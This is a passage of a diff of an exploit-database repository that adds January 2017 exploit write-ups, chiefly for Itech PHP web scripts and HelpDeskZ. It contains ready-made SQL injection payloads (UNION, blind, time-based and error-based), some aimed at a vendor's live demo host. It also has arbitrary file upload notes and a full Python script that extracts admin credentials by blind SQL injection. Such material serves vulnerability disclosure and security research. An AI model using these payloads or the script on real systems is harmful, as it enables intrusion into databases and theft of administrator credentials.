 Vulnerability:
 URL : http://localhost/see_more_details.php?id=40[payload]
 Parameter: id (GET)
 Type: UNION query
 Title: Generic UNION query (NULL) - 29 columns
 Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs
--- a/platforms/php/webapps/41191.txt
+++ b/platforms/php/webapps/41191.txt
@ -0,0 +1,26 @@
 Exploit Title: Itech Freelancer Script v5.13 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/freelancer-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 Itech Freelancer Script v5.13 is the best reverse auction script available online. Just install the product to launch your website within minutes. Please try the product now.
 Type of vulnerability:
 An SQL Injection vulnerability in Itech Freelancer Script v5.13 allows attackers to read
 arbitrary data from the database.
 Vulnerability:
 URL : http://localhost/category.php?sk=4[payload]
 Parameter: sk (GET)
 Type: UNION query
 Title: Generic UNION query (NULL) - 52 columns
 Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL
--- a/platforms/php/webapps/41193.txt
+++ b/platforms/php/webapps/41193.txt
@ -0,0 +1,35 @@
 Exploit Title: Itech Multi Vendor Script 6.49 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/multi-vendor-shopping-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 Multi Vendor Script v6.49 offers a robust eCommerce platform. The script has been designed to deliver all major features required to run an eCommerce website.
 Type of vulnerability:
 An SQL Injection vulnerability in Itech Multi Vendor Script 6.49 allows attackers to read
 arbitrary data from the database.
 Vulnerability:
 http://localhost/multi-vendor-shopping-script/product-list.php?pl=[payload]
 Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' RLIKE (SELECT (CASE WHEN (6851=6851) THEN 0x313132303166663164653737343030356638646131336634323934333838316336353566 ELSE 0x28 END))-- HnQm
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' AND SLEEP(5)-- WHze
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=-3569' UNION ALL SELECT CONCAT(0x716b6a7871,0x7573485a716b767347544870695571415a465846434b5541777566416a6571656d6a5a6c62526f47,0x7170627171),NULL,NULL,NULL,NULL#
 ---
--- a/platforms/php/webapps/41194.txt
+++ b/platforms/php/webapps/41194.txt
@ -0,0 +1,34 @@
 Exploit Title: Itech News Portal Script v6.28 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/news-portal-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 News Portal Script v6.28 is a CMS Software developed as a news broadcasting portal. This product is considered as the best in this category.
 Type of vulnerability:
 An SQL Injection vulnerability in News Portal Script v6.28 allows attackers to read
 arbitrary data from the database.
 Vulnerability:
 http://localhost/news-portal-script/information.php?inf=22[payload]
 Parameter: inf (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: inf=22 AND 3993=3993
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: inf=22 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: inf=-1695 UNION ALL SELECT CONCAT(0x716a787171,0x7356527144546c6e6b47714b49415759595952764c734a657165476f4d496e534e565668666f786f,0x7178787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- trhS
--- a/platforms/php/webapps/41195.txt
+++ b/platforms/php/webapps/41195.txt
@ -0,0 +1,34 @@
 Exploit Title: Itech Real Estate Script v3.12 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/real-estate-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 Itech Real Estate Script v3.12 is a robust platform for launching real-estate portals. This script is currently available under a special pricing of US$199.
 Type of vulnerability:
 An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read
 arbitrary data from the database.
 Vulnerability:
 http://localhost/real-estate-script/search_property.php?property_for=1[payload]
 Parameter: property_for (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: property_for=1 AND 4574=4574
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: property_for=1 AND SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo
--- a/platforms/php/webapps/41197.txt
+++ b/platforms/php/webapps/41197.txt
@ -0,0 +1,35 @@
 # # # # # 
 # Exploit Title: PHP Product Designer Script - Arbitrary File Upload
 # Google Dork: N/A
 # Date: 30.01.2017
 # Vendor Homepage: https://codecanyon.net/item/php-product-designer/19334412
 # Software Buy: https://codecanyon.net/item/php-product-designer/19334412
 # Demo: http://phpproductdesigner.000webhostapp.com/products.php
 # Version: N/A
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[beygir]ihsan[nokta]net
 # # # # #
 # Exploit :
 # http://localhost/[PATH]/products.php / Create New Design
 # http://localhost/[PATH]/theme/images/uploads/[......PHP]
 # # # # #
 # uploadImage.php
 <?php
 $output_dir = "./theme/images/uploads/";
 .
 .
 .
 $imagetemp = explode(".", $_FILES["imagefile"]["name"]);
 		$newimagename = round(microtime(true)) . '.' . end($imagetemp);
 		//move the uploaded file to uploads folder;
    	move_uploaded_file($_FILES["imagefile"]["tmp_name"],$output_dir. $newimagename);
   	 echo $output_dir . $newimagename;
 	}
 }
 ?>
 # # # # #
--- a/platforms/php/webapps/41198.txt
+++ b/platforms/php/webapps/41198.txt
@ -0,0 +1,35 @@
 # # # # # 
 # Exploit Title: PHP Logo Designer Script - Arbitrary File Upload
 # Google Dork: N/A
 # Date: 30.01.2017
 # Vendor Homepage: https://codecanyon.net/item/php-logo-designer/19362231
 # Software Buy: https://codecanyon.net/item/php-logo-designer/19362231
 # Demo: http://phplogodesigner.000webhostapp.com/
 # Version: N/A
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[beygir]ihsan[nokta]net
 # # # # #
 # Exploit :
 # http://localhost/[PATH]/designer.php
 # http://localhost/[PATH]/theme/images/uploads/[......PHP]
 # # # # #
 # uploadImage.php
 <?php
 $output_dir = "./theme/images/uploads/";
 .
 .
 .
 $imagetemp = explode(".", $_FILES["imagefile"]["name"]);
 		$newimagename = round(microtime(true)) . '.' . end($imagetemp);
 		//move the uploaded file to uploads folder;
    	move_uploaded_file($_FILES["imagefile"]["tmp_name"],$output_dir. $newimagename);
   	 echo $output_dir . $newimagename;
 	}
 }
 ?>
 # # # # #
--- a/platforms/php/webapps/41199.txt
+++ b/platforms/php/webapps/41199.txt
@ -0,0 +1,38 @@
 Exploit Title: Video Sharing Script 4.94 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/video-sharing-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 Video Sharing Script v4.94 is the best audio/ video sharing portal. You can easily deploy the software and launch your own video sharing portal in moments.
 Type of vulnerability:
 An SQL Injection vulnerability in Video Sharing Script 4.94 allows attackers to read
 arbitrary data from the database.
 Vulnerability:
 http://localhost/video-sharing-script/watch-video.php?v=67d8ab[payload]
 Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' RLIKE (SELECT (CASE WHEN (1170=1170) THEN 0x363764386162 ELSE 0x28 END))-- Niby
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(2680=2680,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Wovm
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND SLEEP(5)-- pcjq
    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=-8184' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x757277777751656e7948736349597976767448516b784656504a646a72475952546b6d554251736c,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
--- a/platforms/php/webapps/41200.py
+++ b/platforms/php/webapps/41200.py
@ -0,0 +1,172 @@
 '''
 # Exploit Title: HelpDeskZ <= v1.0.2 - Authenticated SQL Injection / Unauthorized file download
 # Google Dork: intext:"Help Desk Software by HelpDeskZ", inurl:?v=submit_ticket
 # Date: 2017-01-30
 # Exploit Author: Mariusz Popławski, kontakt@deepsec.pl ( www.afine.pl )
 # Vendor Homepage: http://www.helpdeskz.com/
 # Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
 # Version: <= v1.0.2
 # Tested on:
 # CVE :
 HelpDeskZ <= v1.0.2 suffers from an sql injection vulnerability that allow to retrieve administrator access data, and download unauthorized attachments.
 Software after ticket submit allow to download attachment by entering following link:
 http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1(ATTACHMENT_ID_HERE)
 FILE: view_tickets_controller.php
 LINE 95:	$attachment = $db->fetchRow("SELECT *, COUNT(id) AS total FROM ".TABLE_PREFIX."attachments WHERE id=".$db->real_escape_string($params[2])." AND ticket_id=".$params[0]." AND msg_id=".$params[3]);
 third argument AND msg_id=".$params[3]; sent to fetchRow query with out any senitization
 Steps to reproduce:
 http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1 or id>0 -- -
 by entering a valid id of param[] which is our submited ticket id and adding our query on the end of request we are able to download any uploaded attachment.
 Call this script with the base url of your HelpdeskZ-Installation and put your submited ticket login data (EMAIL, PASSWORD)
 steps:
 1. go to http://192.168.100.115/helpdesk/?v=submit_ticket
 2. Submit a ticket with valid email (important we need password access).
 3. Add attachment to our ticket (important step as the attachment table may be empty, we need at least 1 attachment in db to valid our query).
 4. Get the password from email.
 4. run script
 root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk/ localhost@localhost.com password123
 where http://192.168.100.115/helpdesk/ = base url to helpdesk
 localhost@localhost.com = email which we use to submit the ticket
 password123 = password that system sent to our email
 Output of script:
 root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk localhost@localhost.com password123
 2017-01-30T09:50:16.426076   GET   http://192.168.100.115/helpdesk
 2017-01-30T09:50:16.429116   GET   http://192.168.100.115/helpdesk/
 2017-01-30T09:50:16.550654   POST   http://192.168.100.115/helpdesk/?v=login
 2017-01-30T09:50:16.575227   GET   http://192.168.100.115/helpdesk/?v=view_tickets
 2017-01-30T09:50:16.674929   GET   http://192.168.100.115/helpdesk?v=view_tickets&action=ticket&param[]=6&param[]=attachment&param[]=1&param[]=1%20or%201=1%20and%20ascii(substr((SeLeCt%20table_name%20from%20information_schema.columns%20where%20table_name%20like%20'%staff'%20%20limit%200,1),1,1))%20=%20%2047%20--%20-
 ...
 ------------------------------------------
 username: admin
 password: sha256(53874ea55571329c04b6998d9c7772c9274d3781)
 '''           
 import requests
 import sys
 if( len(sys.argv) < 3):
 	print "put proper data like in example, remember to open a ticket before.... "
 	print "python helpdesk.py http://192.168.43.162/helpdesk/ myemailtologin@gmail.com password123"
 	exit()
 EMAIL = sys.argv[2]
 PASSWORD = sys.argv[3]
 URL = sys.argv[1]
 def get_token(content):
 	token = content
 	if "csrfhash" not in token:
 		return "error"
 	token = token[token.find('csrfhash" value="'):len(token)]
 	if '" />' in token:
 		token = token[token.find('value="')+7:token.find('" />')] 
 	else:
 		token = token[token.find('value="')+7:token.find('"/>')] 
 	return token
 def get_ticket_id(content):
 	ticketid = content
 	if "param[]=" not in ticketid:
                return "error"
 	ticketid = ticketid[ticketid.find('param[]='):len(ticketid)]
 	ticketid = ticketid[8:ticketid.find('"')]
 	return ticketid
 def main():
    # Start a session so we can have persistant cookies
 	session = requests.session(config={'verbose': sys.stderr})
 	r = session.get(URL+"")
 	#GET THE TOKEN TO LOGIN
        TOKEN = get_token(r.content)
 	if(TOKEN=="error"):
 		print "cannot find token"
 		exit();
    #Data for login 
 	login_data = {
 		'do': 'login',
 		'csrfhash': TOKEN,
 		'email': EMAIL,
 		'password': PASSWORD,
 		'btn': 'Login'
 	}
    # Authenticate
 	r = session.post(URL+"/?v=login", data=login_data)
    #GET  ticketid
 	ticket_id = get_ticket_id(r.content)
        if(ticket_id=="error"):
                print "ticketid not found, open a ticket first"
 		exit()
 	target = URL +"?v=view_tickets&action=ticket&param[]="+ticket_id+"&param[]=attachment&param[]=1&param[]=1"
 	limit = 1
        char = 47
        prefix=[]
        while(char!=123):
                target_prefix = target+ " or 1=1 and ascii(substr((SeLeCt table_name from information_schema.columns where table_name like '%staff'  limit 0,1),"+str(limit)+",1)) =  "+str(char)+" -- -"
                response = session.get(target_prefix).content
                if "couldn't find" not in response:
                        prefix.append(char)
                        limit=limit+1
                        char=47
                else:
                        char=char+1
 	table_prefix = ''.join(chr(i) for i in prefix)
 	table_prefix = table_prefix[0:table_prefix.find('staff')]
 	limit = 1
 	char = 47
 	admin_u=[]
 	while(char!=123):
 		target_username = target+ " or 1=1 and ascii(substr((SeLeCt username from "+table_prefix+"staff  limit 0,1),"+str(limit)+",1)) =  "+str(char)+" -- -"
 		response = session.get(target_username).content
 		if "couldn't find" not in response:
 			admin_u.append(char)
 			limit=limit+1
 			char=47
 		else:
 			char=char+1
        limit = 1
        char = 47
        admin_pw=[]
        while(char!=123):
                target_password = target+ " or 1=1 and ascii(substr((SeLeCt password from "+table_prefix+"staff  limit 0,1),"+str(limit)+",1)) =  "+str(char)+" -- -"
                response = session.get(target_password).content
                if "couldn't find" not in response:
                        admin_pw.append(char)
                        limit=limit+1
                        char=47
                else:
                        char=char+1
 	admin_username = ''.join(chr(i) for i in admin_u)
 	admin_password = ''.join(chr(i) for i in admin_pw)
 	print "------------------------------------------"
 	print "username: "+admin_username
 	print "password: sha256("+admin_password+")"
 	if admin_username==""  and  admin_password=='':
 		print "Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_"
 		print "try to submit ticket with attachment"
 if __name__ == '__main__':
    main()
--- a/platforms/php/webapps/41201.txt
+++ b/platforms/php/webapps/41201.txt
@ -0,0 +1,20 @@
 # # # # # 
 # Exploit Title: Itech Classifieds Script v7.27 - 'pid' Parameter SQL Injection
 # Google Dork: N/A
 # Date: 30.01.2017
 # Vendor Homepage: http://itechscripts.com/
 # Software Buy: http://itechscripts.com/classifieds-script/
 # Demo: http://itechscripts.com/classifieds-script/
 # Version: 7.27
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[beygir]ihsan[nokta]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/message.php?pid=[SQL]
 # E.t.c
 # # # # #
--- a/platforms/php/webapps/41202.txt
+++ b/platforms/php/webapps/41202.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Itech Dating Script v3.26 - 'send_gift.php' SQL Injection
 # Google Dork: N/A
 # Date: 30.01.2017
 # Vendor Homepage: http://itechscripts.com/
 # Software Buy: http://itechscripts.com/dating-script/
 # Demo: http://dating.itechscripts.com/
 # Version: 3.26
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[beygir]ihsan[nokta]net
 # # # # #
 # SQL Injection/Exploit :
 # Login as regular user
 # http://localhost/[PATH]/send_gift.php?id=[SQL]
 # E.t.c
 # # # # #
--- a/platforms/php/webapps/41203.txt
+++ b/platforms/php/webapps/41203.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Itech Real Estate Script v3.12 - 'id' Parameter SQL Injection
 # Google Dork: N/A
 # Date: 30.01.2017
 # Vendor Homepage: http://itechscripts.com/
 # Software Buy: http://itechscripts.com/real-estate-script/
 # Demo: http://real-estate.itechscripts.com
 # Version: 3.12
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[beygir]ihsan[nokta]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/agent_search_property.php?id=[SQL]
 # E.t.c
 # # # # #
--- a/platforms/win_x86/local/11112.c
+++ b/platforms/win_x86/local/11112.c
--- a/platforms/win_x86/local/18861.php
+++ b/platforms/win_x86/local/18861.php
@ -13,7 +13,7 @@
 <title>0day</title>
 <center>
 <font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
-<textarea rows=50 cols=50 id="log">&lt;/textarea&gt;
+<textarea rows=50 cols=50 id="log"></textarea>
 </center>
 <script>
 function sleep(milliseconds) {
--- a/platforms/win_x86/local/3451.c
+++ b/platforms/win_x86/local/3451.c
--- a/platforms/win_x86/local/3888.c
+++ b/platforms/win_x86/local/3888.c
--- a/platforms/win_x86/local/3912.c
+++ b/platforms/win_x86/local/3912.c
--- a/platforms/win_x86/local/39432.c
+++ b/platforms/win_x86/local/39432.c
--- a/platforms/win_x86/local/39574.cs
+++ b/platforms/win_x86/local/39574.cs
--- a/platforms/win_x86/local/40564.c
+++ b/platforms/win_x86/local/40564.c
--- a/platforms/win_x86/local/40627.c
+++ b/platforms/win_x86/local/40627.c
--- a/platforms/win_x86/local/8799.txt
+++ b/platforms/win_x86/local/8799.txt
--- a/platforms/win_x86/remote/1264.pl
+++ b/platforms/win_x86/remote/1264.pl
--- a/platforms/win_x86/remote/3680.sh
+++ b/platforms/win_x86/remote/3680.sh
--- a/platforms/win_x86/remote/3822.c
+++ b/platforms/win_x86/remote/3822.c
--- a/platforms/win_x86/remote/4754.pl
+++ b/platforms/win_x86/remote/4754.pl
--- a/platforms/win_x86/remote/5079.c
+++ b/platforms/win_x86/remote/5079.c
--- a/platforms/win_x86/remote/5330.c
+++ b/platforms/win_x86/remote/5330.c
--- a/platforms/win_x86/remote/584.c
+++ b/platforms/win_x86/remote/584.c
--- a/platforms/win_x86/remote/6100.py
+++ b/platforms/win_x86/remote/6100.py